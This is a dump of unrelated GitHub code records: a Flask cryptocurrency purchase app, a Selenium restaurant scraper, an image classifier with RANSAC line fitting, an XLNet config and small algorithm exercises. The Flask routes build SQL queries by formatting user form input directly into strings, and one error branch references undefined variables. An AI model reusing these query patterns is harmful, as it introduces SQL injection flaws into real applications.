range(batch_size):\n ou = out[0][b]\n print(np.mean(ou))\n print(np.max(ou))\n print(np.min(ou))\n","repo_name":"louishenrifranc/ImageFilling","sub_path":"test/test_data_augmentation.py","file_name":"test_data_augmentation.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35757668874","text":"from the_app import app\nfrom the_app.form import CompraForm\nfrom flask import render_template, request, redirect, url_for\nfrom requests import Request, Session\nfrom datetime import datetime\n\nimport requests, sqlite3,json\n\n\n@app.route(\"/\")\ndef index():\n\tconn = sqlite3.connect(app.config['BASE_DATOS'])\n\tcur = conn.cursor()\n\n\thayregistros = \"SELECT * FROM compras\"\n\tregistros=cur.execute(hayregistros).fetchall()\n\t\n\ttry:\n\t\tif len(registros) == 0:\n\t\t\t\treturn render_template('sinmovimientos.html')\n\t\t\t\t\t\n\t\telse:\t\n\t\t\t\tquery = \"SELECT date,time,from_currency,from_quantity,to_currency,to_quantity,P_U from compras\"\n\t\t\t\tmovimientos= cur.execute(query).fetchall()\n\t\t\t\treturn render_template('movimientos.html', movimientos=movimientos)\n\texcept Exception as e:\n\t\t\t\terror_acceso = ('Se ha producido un error de acceso a la base de datos: {}'.format(e))\n\t\t\t\treturn render_template('movimientos.html', acceso_base_datos= error_acceso)\n\n\tconn.close()\n\n\n@app.route(\"/purchase\", methods=['GET','POST'])\ndef purchase():\n\t\n\tnow = datetime.now()\n\ttime = str(now.time())\n\ttime = time[0:8]\n\n\tform = CompraForm(request.form)\n\n\tif request.method == 'GET':\n\t\treturn render_template('compras.html', form=form)\n\n\telif request.form.get('rechazar'):\n\t\t\treturn redirect(url_for(\"index\"))\n\n\t\n\telse:\n\t\tif request.form.get('calcular'):\n\t\t\tif form.validate():\n\t\t\t\tAPY = app.config['APY_KEY']\n\t\t\t\tURL = 'https://pro-api.coinmarketcap.com/v1/tools/price-conversion?amount={}&symbol={}&convert={}&CMC_PRO_API_KEY={}'\n\t\t\t\trespuesta = requests.get(URL.format(request.values.get('Q_Form'), request.values.get('MonedaFrom'), request.values.get('MonedaTo'),APY))\n\t\t\t\t\n\t\t\t\t#try:\n\t\t\t\tif respuesta.status_code == 200:\n\t\t\t\t\tjson = respuesta.json()\n\t\t\t\n\t\t\t\t\tprice =json.get('data').get('quote').get(request.values.get('MonedaTo'))['price']\n\t\t\t\t\tcantidad = request.values.get('Q_Form')\n\t\t\t\t\n\t\t\t\t\tprice = float(price) \n\t\t\t\t\tcantidad = float(cantidad)\n\n\t\t\n\t\t\t\t\tprecio_unitario = price/cantidad\n\n\t\t\t\t\tform.Q_to.data = price\n\t\t\t\t\tform.P_U.data = precio_unitario\n\n\t\t\t\t\tprice = round(price, 8)\n\t\t\t\t\tprecio_unitario = round(precio_unitario, 8)\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\treturn render_template('compras.html',form=form, price=price, precio_unitario=precio_unitario)\n\t\t\t\t\n\t\t\t\t#except Exception as e:\n\t\t\t\telse:\n\t\t\t\t\terror_api = ('Se ha producido un error al consultar el valor actual de su moneda. Inténtelo de nuevo o contacte con el administrador') \n\t\t\t\t\tprint(\"Error de consulta en API:\", errorApi.get(resutls.status_code), errorApi.get(mensaje))\n\t\t\t\t\treturn render_template('compras.html', form=form, acceso_error_api= error_api)\n\t\t\t\t\n\t\t\telse:\n\t\t\t\treturn render_template('compras.html',form=form)\n\t\t\n\t\telif request.form.get('rechazar'):\n\t\t\treturn redirect(url_for(\"index\"))\n\n\t\telse:\n\t\t\t\t\tif form.Q_to.data == '':\n\t\t\t\t\t\t error = ('Por favor, pulsa el botón \"CAL\" para poder calcular el precio')\n\t\t\t\t\t\t return render_template('compras.html', form=form, calculaPrecio=error)\n\t\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tif form.validate():\t\t\n\t\n\t\t\t\t\t\t\tconn = sqlite3.connect(app.config['BASE_DATOS'])\n\t\t\t\t\t\t\tcur = conn.cursor()\n\n\t\t\t\t\t\t\tSaldo = \"SELECT sum(to_quantity) from compras WHERE from_quantity !='EUR' and from_quantity = '{}'\".format(request.values.get('MonedaFrom'))\n\t\t\t\t\t\t\tcantidadFrom=cur.execute(Saldo).fetchall()\n\t\t\t\t\t\t\tsaldoFrom = cantidadFrom[0]\n\n\t\t\t\t\t\t\tSaldo = \"SELECT sum(to_currency) from compras WHERE from_currency != 'EUR' and from_currency = '{}'\".format(request.values.get('MonedaFrom'))\n\t\t\t\t\t\t\tcantidadTo=cur.execute(Saldo).fetchall()\n\t\t\t\t\t\t\tsaldoTo = cantidadTo[0]\n\n\t\t\t\t\t\t\thayMoneda = \"SELECT from_quantity from compras WHERE from_quantity = '{}'\".format(request.values.get('MonedaFrom'))\n\t\t\t\t\t\t\tmonedas\t= cur.execute(hayMoneda).fetchall()\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif request.values.get('MonedaFrom') == 'EUR':\n\n\t\t\t\t\t\t\t\tquery = \"INSERT INTO compras (date,time,from_currency,from_quantity,to_currency,to_quantity,P_U) values (?,?,?,?,?,?,?);\"\n\t\t\t\t\t\t\t\tdatos =(now.date(),time,request.values.get('MonedaFrom'), request.values.get('MonedaTo'), request.values.get('Q_Form'),round(float(form.Q_to.data), 8),round(float(form.P_U.data), 8))\n\n\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\tcur.execute(query,datos)\n\t\t\t\t\t\t\t\t\t\tconn.commit()\n\t\t\t\t\t\t\t\t\t\treturn redirect(url_for(\"index\"))\t\n\n\t\t\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\t\t\t\terrorbd = ('Error de acceso a la base de datos: {}'.format(e))\n\t\t\t\t\t\t\t\t\t\treturn render_template('compras.html',form=form, error_bd=errorbd)\n\n\t\t\t\t\t\t\t\tconn.close()\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tfor moneda in monedas:\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tif moneda != 'EUR':\n\t\t\t\t\t\t\t\t\t\tif saldoFrom[0] is not None or saldoTo[0] is not None:\n\n\t\t\t\t\t\t\t\t\t\t\t\tif saldoFrom[0] and saldoTo[0] != None:\n\t\t\t\t\t\t\t\t\t\t\t\t\tsaldo = saldoFrom[0] - saldoTo[0]\n\n\t\t\t\t\t\t\t\t\t\t\t\telif saldoFrom[0] == None and saldoTo[0] is not None:\n\t\t\t\t\t\t\t\t\t\t\t\t\tsaldo = saldoTo[0]\n\n\t\t\t\t\t\t\t\t\t\t\t\telif saldoFrom[0] is not None and saldoTo[0]== None:\n\t\t\t\t\t\t\t\t\t\t\t\t\tsaldo = saldoFrom[0]\n\n\t\t\t\t\t\t\t\t\t\tCantidad = float(request.values.get('Q_Form'))\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tif saldo >= Cantidad:\n\t\t\t\t\t\t\t\t\t\t\t\tquery = \"INSERT INTO compras (date,time,from_currency,from_quantity,to_currency,to_quantity,P_U) values (?,?,?,?,?,?,?);\"\n\t\t\t\t\t\t\t\t\t\t\t\tdatos =(now.date(),time,request.values.get('MonedaFrom'), request.values.get('MonedaTo'), request.values.get('Q_Form'),round(float(form.Q_to.data), 8),round(float(form.P_U.data), 8))\n\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\terrorsaldo = ('Saldo insuficiente. No tienes suficiente cantidad de {} para comprar: {} - {}. Por favor, intentalo con una cantidad menor o con otra criptomoneda de la que disponga con más saldo.'.format(request.values.get('MonedaFrom'),request.values.get('Q_Form'),request.values.get('MonedaTo')))\n\t\t\t\t\t\t\t\t\t\t\treturn render_template('compras.html',form=form, error_saldo=errorsaldo)\n\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\tcur.execute(query,datos)\n\t\t\t\t\t\t\t\t\t\tconn.commit()\n\t\t\t\t\t\t\t\t\t\treturn redirect(url_for(\"index\"))\t\n\n\t\t\t\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\t\t\t\terrorbd = ('Error de acceso a la base de datos: {}'.format(e))\n\t\t\t\t\t\t\t\t\t\treturn render_template('compras.html',form=form, error_bd=errorbd)\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tconn.close()\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\terrormoneda = ('No tienes saldo de esta moneda, intenta comprar con alguna moneda de las que dispongas saldo')\n\t\t\t\t\t\t\t\treturn render_template('compras.html',form=form, error_moneda=errormoneda)\n\n\t\t\t\t\t\t\t\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\treturn render_template('compras.html',form=form)\n\n\n@app.route(\"/status\")\ndef status():\n\tconn = sqlite3.connect(app.config['BASE_DATOS'])\n\tcur = conn.cursor()\n\t\n\ttry:\n\t\t\t## Conocer la Inversión Atrapada\n\t\t\tconsultasaldo = \"SELECT sum(to_quantity) from compras WHERE from_quantity = 'EUR'\"\n\t\t\tsaldoEuros=cur.execute(consultasaldo).fetchall()\n\t\t\tsaldoenEuros = saldoEuros[0]\n\t\t\t\n\t\t\tconsultasaldo = \"SELECT sum(to_currency) from compras WHERE from_currency = 'EUR'\"\n\t\t\tinvierteEuros=cur.execute(consultasaldo).fetchall()\n\t\t\tInvierteEuros = invierteEuros[0]\n\n\t\t\tMonedas = (\"BTC\", \"ETH\", \"XRP\", \"LTC\", \"BCH\", \"BNB\", \"USDT\", \"EOS\", \"BSV\", \"XLM\", \"ADA\", \"TRX\")\n\t\t\t\n\t\t\t## Almacenar la Inversión Atrapada\n\t\t\td = {}\n\t\t\tfor moneda in Monedas: \n\t\t\t\tconsultacryto = \"SELECT sum(to_quantity) from compras WHERE from_quantity = '{}'\".format(moneda)\n\t\t\t\tcompraCrypto=cur.execute(consultacryto).fetchall()\n\t\t\t\tcompracrypto = compraCrypto[0]\n\n\t\t\t\tconsultacrypto = \"SELECT sum(to_currency) from compras WHERE from_currency = '{}'\".format(moneda)\n\t\t\t\tinvierteCrypto=cur.execute(consultacrypto).fetchall()\n\t\t\t\tICrypto = invierteCrypto[0]\n\n\t\t\t\tif compracrypto[0] is not None or ICrypto[0] is not None:\n\n\t\t\t\t\tif compracrypto[0] and ICrypto[0] is not None:\n\t\t\t\t\t\td[moneda] = compracrypto[0] - ICrypto[0]\n\n\t\t\t\t\telif compracrypto[0] == None and ICrypto[0] is not None:\n\t\t\t\t\t\td[moneda] = ICrypto[0]\n\n\t\t\t\t\telse:\n\t\t\t\t\t\td[moneda] = compracrypto[0]\n\t\t\t\t\n\n\t\t\t## Convertir a Euros la Inversión Atrapada\n\t\t\tEuros = []\n\t\t\tfor key in d:\n\n\t\t\t\tAPY = app.config['APY_KEY']\n\t\t\t\tURL = 'https://pro-api.coinmarketcap.com/v1/tools/price-conversion?amount={}&symbol={}&convert=EUR&CMC_PRO_API_KEY={}'\n\t\t\t\trespuesta = requests.get(URL.format(d.get(key),key,APY))\n\t\t\t\tjson = respuesta.json()\n\t\t\t\tEuros.append(json.get('data').get('quote').get('EUR')['price'])\n\n\t\t\tSumaEuros = sum(Euros)\n\t\t\tIAEuros = round(SumaEuros,2)\n\n\t\t\t#Calcular el Valor Actual de la cantidad Invertida\n\n\t\t\tif saldoenEuros[0] == None:\n\t\t\t\tvalorActual = InvierteEuros[0] + IAEuros\n\n\t\t\telif InvierteEuros[0] == None:\n\t\t\t\tvalorActual = saldoenEuros[0] + IAEuros\n\n\t\t\telse:\n\t\t\t\tvalorActual = saldoenEuros[0] + InvierteEuros[0] + IAEuros\n\n\t\n\t\t\treturn render_template('estado.html', saldoenEuros= InvierteEuros[0], valorActual = round(valorActual,2))\n\n\t\t\t\n\texcept Exception as e:\n\t\t\t\t\terror_acceso = ('Se ha producido un error de acceso a la base de datos: {}'.format(e))\n\t\t\t\t\treturn render_template('estado.html', acceso_base_datos= error_acceso)\n\n\tconn.close()\n\n\n\n\n\n\n","repo_name":"isagomezgalvez-hub/Proyecto_boot_z_5","sub_path":"the_app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":8775,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17630918268","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.firefox.options import Options\nimport time\nimport json\nfrom decimal import Decimal\nfrom dish import Dish\nfrom dynamodb_write import DynamoDBWrite\nfrom write_to_s3_parquet import WriteS3Parquet\nimport datetime\nfrom dish_info import DishInfo\n\n\nclass BehrouzBiryani:\n\n def __init__(self, url=None):\n \n self.CONFIG_FILE = \"jwt-config.json\"\n with open(self.CONFIG_FILE,'r') as config_file:\n self.data_set = json.load(config_file)\n\n self.starter_config = self.data_set['BEHROUZ_BIRYANI']['CONFIG']['STARTER']\n self.config = self.data_set['BEHROUZ_BIRYANI']['CONFIG']\n self.dish_config = self.data_set['BEHROUZ_BIRYANI']['CONFIG']['DISH']\n self.options = Options()\n self.options.headless = True\n self.driver = webdriver.Firefox(options=self.options)\n self.url = self.starter_config[\"URL\"]\n self.city = 'general'\n self.country = 'india'\n self.city_code = self.city+'__'+self.country\n self.all_dishes_url = []\n self.restaurant_obj = {}\n\n \n\n def get_details(self):\n\n try:\n self.driver.get(self.url)\n\n try:\n FIND_BY = self.dish_config['SELECTORS']['WAIT']['FIND_BY']\n VALUE = self.dish_config['SELECTORS']['WAIT']['VALUE']\n\n if FIND_BY == 'class':\n element = WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.CLASS_NAME, VALUE))\n )\n elif FIND_BY == 'id':\n element = WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.ID, VALUE))\n )\n elif FIND_BY == 'tag':\n element = WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.TAG_NAME, VALUE))\n )\n\n IMAGE_CONTAINER = {\n 'FIND_BY': self.starter_config['SELECTORS']['IMAGE_CONTAINER']['FIND_BY'],\n 'VALUE' : self.starter_config['SELECTORS']['IMAGE_CONTAINER']['VALUE']\n }\n \n CTG_NAV = {\n 'FIND_BY': self.dish_config['SELECTORS']['CATEGORY_NAV']['FIND_BY'],\n 'VALUE' : self.dish_config['SELECTORS']['CATEGORY_NAV']['VALUE']\n }\n CATEGORIES = {\n 'FIND_BY': self.dish_config['SELECTORS']['CATEGORIES']['FIND_BY'],\n 'VALUE' : self.dish_config['SELECTORS']['CATEGORIES']['VALUE']\n }\n\n # if IMAGE_CONTAINER['FIND_BY'] == 'class':\n # image_container = driver.find_element_by_class_name(IMAGE_CONTAINER['VALUE'])\n # elif IMAGE_CONTAINER['FIND_BY'] == 'id':\n # image_container = driver.find_element_by_id(IMAGE_CONTAINER['VALUE'])\n # elif IMAGE_CONTAINER['FIND_BY'] == 'tag':\n # image_container = driver.find_element_by_tag_name(IMAGE_CONTAINER['VALUE'])\n\n # image = image_container.get_attribute('src')\n # print('++++++++',image)\n\n if CTG_NAV['FIND_BY'] == 'class':\n ctg_nav = self.driver.find_element_by_class_name(CTG_NAV['VALUE'])\n elif CTG_NAV['FIND_BY'] == 'id':\n ctg_nav = self.driver.find_element_by_id(CTG_NAV['VALUE'])\n elif CTG_NAV['FIND_BY'] == 'tag':\n ctg_nav = self.driver.find_element_by_tag_name(CTG_NAV['VALUE'])\n\n if CATEGORIES['FIND_BY'] == 'class':\n categories = ctg_nav.find_elements_by_class_name(CATEGORIES['VALUE'])\n elif CATEGORIES['FIND_BY'] == 'id':\n categories = ctg_nav.find_element_by_id(CATEGORIES['VALUE'])\n elif CATEGORIES['FIND_BY'] == 'tag':\n categories = ctg_nav.find_elements_by_tag_name(CATEGORIES['VALUE'])\n\n self.restaurant_obj = {\n 'city_code':self.city_code,\n 'name':\"Behrouz Biryani\",\n 'type':\"Biryani, Mughlai\",\n 'stars':4.1,\n 'ratings':\"100+ Ratings\",\n 'image':\"https://product-assets.faasos.io/production/product/image_1562244587528_brz_june_mehfil.jpg\",\n 'opens_at':None,\n 'country':self.country,\n 'city':self.city,\n 'subzone':'General',\n 'platform':'Behrouz Biryani',\n 'dishes':[],\n 'added_on': str(datetime.datetime.utcnow())\n }\n\n\n self.dish_obj = Dish(self.driver, self.dish_config)\n\n for ctg in categories:\n id = ctg.get_attribute('id')\n category = ctg.text\n # print('*****',id,category)\n self.dish_obj.get_dishes(ctg, self.all_dishes_url)\n\n \n self.get_all_dishes_info(self.all_dishes_url)\n print('********',self.restaurant_obj,len(self.restaurant_obj['dishes']))\n sort_key_info = self.restaurant_obj['platform']+'__'+self.restaurant_obj['subzone']+'__'+self.restaurant_obj['name'].strip().replace(' ','_')\n self.restaurant_obj['sort_key_info'] = sort_key_info\n self.restaurant_obj['stars'] = Decimal(str(self.restaurant_obj['stars']))\n\n # write to dynamodb\n self.dynamodb_write_obj = DynamoDBWrite()\n self.dynamodb_write_obj.dynamodb_write(self.restaurant_obj)\n \n\n # # write data to parquet in s3\n self.restaurant_obj['stars'] = float(self.restaurant_obj['stars'])\n self.write_to_s3_parquet_obj = WriteS3Parquet(self.city)\n self.write_to_s3_parquet_obj.write_to_parquet(self.restaurant_obj)\n \n \n except Exception as e:\n print('++++++++NOT DONE',e)\n\n \n self.driver.close()\n \n except Exception as e:\n print('+++++++Exception while contents of given url',e)\n\n \n def get_all_dishes_info(self, all_dishes_url):\n\n for url in all_dishes_url:\n dish_info_obj = DishInfo(self.driver, self.dish_config)\n main_window = self.driver.current_window_handle\n self.driver.execute_script(\"window.open('');\")\n time.sleep(1)\n self.driver.switch_to.window(self.driver.window_handles[1])\n dish_info_obj.get_dish_info(url, self.restaurant_obj)\n self.driver.close()\n self.driver.switch_to_window(main_window)\n \n\nif __name__ == '__main__':\n\n behrouzBiryani = BehrouzBiryani(\"https://www.behrouzbiryani.com/bangalore/residency-road\")\n \n behrouzBiryani.get_details()\n","repo_name":"kumawat0008/web-scraping","sub_path":"behrouzbiryani/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73181045352","text":"\n#2,3,5에다��� 235를 계속 곱해야함\n# 4 6 10 6 9 15\nlst = [1,2,3,5]\nN = int(input())\nplg = 0\nwhile True:\n for i in lst:\n if 2*i not in lst:\n lst.append(2*i)\n if 3*i not in lst:\n lst.append(3*i)\n if 5 * i not in lst:\n lst.append(5*i)\n if 1000 in lst:\n plg = 1\n break\n if plg == 1:\n break\nlst.sort()\nprint(lst[N-1])","repo_name":"Younggil-kim/Algorithm_with_python","sub_path":"DP/못생긴 수_381page.py","file_name":"못생긴 수_381page.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5056362633","text":"\r\nimport cv2\r\n\r\n\r\ncap = cv2.VideoCapture(\"a.mp4\")\r\n\r\nfourcc = cv2.VideoWriter_fourcc(*'h263')\r\nout = cv2.VideoWriter('cv2_cameraaa_output.mp4',fourcc, 20.0, (800,600))\r\n\r\n\r\nwhile True:\r\n ret, frame = cap.read()\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n cv2.imshow('frame', frame)\r\n cv2.imshow('gray', gray)\r\n frame = cv2.resize(frame,(800,600))\r\n out.write(frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n\r\ncap.release()\r\nout.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"rravicha/PyRep","sub_path":"mohan_pgm/Python-Sample/Python_Experiements/cv2video.py","file_name":"cv2video.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71856458473","text":"#!/usr/bin/env python\n\n##############\n#### Your name: Yingqi Chen\n##############\n\nimport numpy as np\nimport re, math\nfrom sklearn import svm, metrics\nfrom skimage import io, feature, filters, exposure, color, measure, transform\nimport ransac_score\n\nclass ImageClassifier:\n \n def __init__(self):\n self.classifier = None\n\n def imread_convert(self, f):\n return io.imread(f).astype(np.uint8)\n\n def load_data_from_folder(self, dir):\n # read all images into an image collection\n ic = io.ImageCollection(dir+\"*.bmp\", load_func=self.imread_convert)\n \n #create one large array of image data\n data = io.concatenate_images(ic)\n \n #extract labels from image names\n labels = np.array(ic.files)\n for x, y in enumerate(labels):\n m = re.search(\"_\", y)\n labels[x] = y[len(dir):m.start()]\n \n return(data,labels)\n \n def extract_image_features(self, data):\n # Please do not modify the header above\n\n\n ########################\n ######## YOUR CODE HERE\n ########################\n # extract feature vector from image data\n arr = []\n for im in data:\n im_gray = color.rgb2gray(im)\n \n im_gray = filters.gaussian(im_gray, sigma=0.4)\n \n f = feature.hog(im_gray, orientations=10, pixels_per_cell=(48, 48), cells_per_block=(4, 4), feature_vector=True, block_norm='L2-Hys')\n arr.append(f)\n \n\n feature_data = np.array(arr)\n return(feature_data)\n \n \n def train_classifier(self, train_data, train_labels):\n # Please do not modify the header above\n\n # train model and save the trained model to self.classifier\n\n ########################\n ######## YOUR CODE HERE\n ########################\n self.classifer = svm.LinearSVC()\n self.classifer.fit(train_data, train_labels)\n\n def predict_labels(self, data):\n # Please do not modify the header\n\n # predict labels of test data using trained model in self.classifier\n # the code below expects output to be stored in predicted_labels\n\n ########################\n ######## YOUR CODE HERE\n ########################\n predicted_labels = self.classifer.predict(data)\n return predicted_labels\n\n def line_fitting(self, data):\n # Please do not modify the header\n\n # fit a line the to arena wall using RANSAC\n # return two lists containing slopes and y intercepts of the line\n\n ########################\n ######## YOUR CODE HERE\n ########################\n slope = []\n intercept = []\n\n for img in data:\n # Convert the image to grayscale\n gray_image = color.rgb2gray(img)\n\n # Apply Gaussian filter with sigma around 3\n smoothed_image = filters.gaussian(gray_image, sigma=3)\n\n # Perform edge detection using Canny\n edges = feature.canny(smoothed_image)\n\n # Extract coordinates of edge pixels\n edge_coords = np.column_stack(np.where(edges))\n\n # Extract x and y coordinates\n x_coords = edge_coords[:, 1]\n y_coords = edge_coords[:, 0]\n\n # Perform RANSAC-based line fitting\n # In this case, the acceptable_dist changed from 1.0 to 0.5 will resolve the line fitting issue\n slopes, intercepts = self.ransac_line_fit(x_coords, y_coords, num_samples=2, repeats=1000,\n acceptable_dist=0.5)\n\n slope.append(slopes)\n intercept.append(intercepts)\n\n # Please do not modify the return type below\n return slope, intercept\n\n def ransac_line_fit(self, x_coord, y_coord, num_samples, repeats, acceptable_dist):\n best_slope = None\n best_intercept = None\n max_inliers = 0\n\n for _ in range(repeats):\n # Choose a random set of points\n random_indices = np.random.choice(len(x_coord), num_samples, replace=False)\n x_subset = x_coord[random_indices]\n y_subset = y_coord[random_indices]\n\n # Fit a line to the random subset of points\n line = np.polyfit(x_subset, y_subset, 1)\n slope, intercept = line[0], line[1]\n\n # Calculate perpendicular distances from the line\n distances = np.abs(y_coord - (slope * x_coord + intercept))\n\n # Count inliers (points close to the line)\n inliers = np.sum(distances <= acceptable_dist)\n\n # Update best model if this model is better\n if inliers > max_inliers:\n max_inliers = inliers\n best_slope, best_intercept = slope, intercept\n\n return best_slope, best_intercept\n\ndef main():\n\n img_clf = ImageClassifier()\n\n # load images\n (train_raw, train_labels) = img_clf.load_data_from_folder('./train/')\n (test_raw, test_labels) = img_clf.load_data_from_folder('./test/')\n (wall_raw, _) = img_clf.load_data_from_folder('./wall/')\n \n # convert images into features\n train_data = img_clf.extract_image_features(train_raw)\n test_data = img_clf.extract_image_features(test_raw)\n \n # train model and test on training data\n img_clf.train_classifier(train_data, train_labels)\n predicted_labels = img_clf.predict_labels(train_data)\n print(\"\\nTraining results\")\n print(\"=============================\")\n print(\"Confusion Matrix:\\n\",metrics.confusion_matrix(train_labels, predicted_labels))\n print(\"Accuracy: \", metrics.accuracy_score(train_labels, predicted_labels))\n print(\"F1 score: \", metrics.f1_score(train_labels, predicted_labels, average='micro'))\n \n # test model\n predicted_labels = img_clf.predict_labels(test_data)\n print(\"\\nTest results\")\n print(\"=============================\")\n print(\"Confusion Matrix:\\n\",metrics.confusion_matrix(test_labels, predicted_labels))\n print(\"Accuracy: \", metrics.accuracy_score(test_labels, predicted_labels))\n print(\"F1 score: \", metrics.f1_score(test_labels, predicted_labels, average='micro'))\n\n # ransac\n print(\"\\nRANSAC results\")\n print(\"=============================\")\n s, i = img_clf.line_fitting(wall_raw)\n print(f\"Line Fitting Score: {ransac_score.score(s,i)}/10\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"yingqi955/inventory-image-recognition","sub_path":"imgclassification.py","file_name":"imgclassification.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31496458799","text":"import warnings\n\nclass XLNetConfig(object):\n def __init__(\n self,\n vocab_size=32000,\n d_model=1024,\n n_layer=24,\n n_head=16,\n d_inner=4096,\n ff_activation=\"gelu\",\n untie_r=True,\n attn_type=\"bi\",\n initializer_range=0.02,\n layer_norm_eps=1e-12,\n dropout=0.0,\n mem_len=512,\n reuse_len=None,\n use_mems_eval=True,\n use_mems_train=False,\n bi_data=False,\n clamp_len=-1,\n same_length=False,\n summary_type=\"last\",\n summary_use_proj=True,\n summary_activation=\"tanh\",\n summary_last_dropout=0.0,\n start_n_top=5,\n end_n_top=5,\n pad_token_id=5,\n bos_token_id=1,\n eos_token_id=2,\n output_attentions=False,\n output_hidden_states=False,\n chunk_size_feed_forward=0,\n num_labels=2,\n **kwargs\n ):\n\n self.vocab_size = vocab_size\n self.d_model = d_model\n self.n_layer = n_layer\n self.n_head = n_head\n if d_model % n_head != 0:\n raise ValueError(f\"'d_model % n_head' ({d_model % n_head}) should be equal to 0\")\n if \"d_head\" in kwargs:\n if kwargs[\"d_head\"] != d_model // n_head:\n raise ValueError(\n f\"`d_head` ({kwargs['d_head']}) should be equal to `d_model // n_head` ({d_model // n_head})\"\n )\n self.d_head = d_model // n_head\n self.ff_activation = ff_activation\n self.d_inner = d_inner\n self.untie_r = untie_r\n self.attn_type = attn_type\n\n self.initializer_range = initializer_range\n self.layer_norm_eps = layer_norm_eps\n\n self.dropout = dropout\n self.mem_len = mem_len\n self.reuse_len = reuse_len\n self.bi_data = bi_data\n self.clamp_len = clamp_len\n self.same_length = same_length\n\n self.summary_type = summary_type\n self.summary_use_proj = summary_use_proj\n self.summary_activation = summary_activation\n self.summary_last_dropout = summary_last_dropout\n self.start_n_top = start_n_top\n self.end_n_top = end_n_top\n\n self.bos_token_id = bos_token_id\n self.pad_token_id = pad_token_id\n self.eos_token_id = eos_token_id\n\n if \"use_cache\" in kwargs:\n warnings.warn(\n \"The `use_cache` argument is deprecated and will be removed in a future version, use `use_mems_eval`\"\n \" instead.\",\n FutureWarning,\n )\n use_mems_eval = kwargs[\"use_cache\"]\n\n self.use_mems_eval = use_mems_eval\n self.use_mems_train = use_mems_train\n self.pad_token_id = pad_token_id\n self.bos_token_id = bos_token_id\n self.eos_token_id = eos_token_id\n self.output_attentions = output_attentions\n self.output_hidden_states = output_hidden_states\n self.chunk_size_feed_forward = chunk_size_feed_forward\n self.num_labels = num_labels\n\n","repo_name":"sj1104/Hetu","sub_path":"examples/transformers/xlnet/xlnet_config.py","file_name":"xlnet_config.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"36213879334","text":"from preprocess import ColumnSumFilter, ColumnStdFilter, PolynomialTransformer\nfrom training import find_best_repository_classification\nfrom evaluation import get_cleaned_processed_df, drop_text_features\nfrom sklearn.pipeline import Pipeline\n\nif __name__ == '__main__':\n data_frame = get_cleaned_processed_df()\n data_frame = drop_text_features(data_frame)\n\n ppl = Pipeline([\n ('clmn_std_filter', ColumnStdFilter(min_std=10)),\n ('clmn_sum_filter', ColumnSumFilter(min_sum=10000)),\n ('poly_transf', PolynomialTransformer(degree=2))\n ])\n preprocessed_df = ppl.transform(data_frame)\n y_train = preprocessed_df.pop(\"label\")\n find_best_repository_classification(preprocessed_df, y_train)","repo_name":"WGierke/git_better","sub_path":"app/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"71621751273","text":"\nclass Solution:\n\n def minSubArrayLen(self, s, nums):\n\n total, left, res = 0, 0, float('inf')\n for i in range(len(nums)):\n total += nums[i]\n while left <= i and total >= s:\n res = min(res, i-left+1)\n total -= nums[left]\n left += 1\n if res == float('inf'):\n return 0\n else:\n return res\n\n # slide window\n\n def minSubArrayLen(self, s: int, nums: List[int]) -> int:\n if sum(nums) < s: return 0\n left, right, x = 0, 0, len(nums)+1\n res = 0\n while right < len(nums):\n while right < len(nums) and res < s:\n res += nums[right]\n right += 1\n while left < right and res >= s:\n x = min(x, right - left)\n res -= nums[left]\n left += 1\n return x\n ","repo_name":"thomasyu929/Leetcode","sub_path":"Array/minSizeSubarraySum.py","file_name":"minSizeSubarraySum.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6027213221","text":"\nimport re \ns = \"asdfjvjadsffvaadfkfasaffdsasdffadsafafsafdadsfaafd happy happy\"\n \nret = re.findall(r'\\bha[a-z]*' , s) 